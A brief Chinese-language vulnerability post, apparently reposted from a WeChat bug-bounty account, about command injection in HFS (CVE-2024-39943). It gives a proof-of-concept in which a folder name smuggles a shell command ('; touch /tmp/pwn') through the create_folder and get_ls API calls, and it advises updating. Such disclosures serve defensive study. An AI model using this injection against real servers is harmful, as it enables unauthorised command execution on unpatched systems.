HFS(HTTP 文件服务器)是一款流行的文件共享软件,用于通过 HTTP 发送和接收文件,现已发现一个严重漏洞。该漏洞被追踪为CVE-2024-39943,对在 Linux、UNIX 和 macOS 上运行 0.52.10 之前版本的 HFS 的系统构成重大威胁。该漏洞的 CVSS 评分为9.9,允许具有上传权限的远程经过身份验证的用户执行操作系统命令。
通过post请求~/api/create_folder路径创建name的目录{"uri":"/tmp/","name":"poc";touch /tmp/pwn"}之后通过访问~/api/get_ls?path=poc";touch /tmp/pwn 触发命令执行。
修复:更新到最新版本。
仅限交流学习使用,如您在使用本工具或代码的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。“如侵权请私聊公众号删文”。
原文始发于微信公众号(柠檬赏金猎人):hfs3命令执行漏洞CVE-2024-39943
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论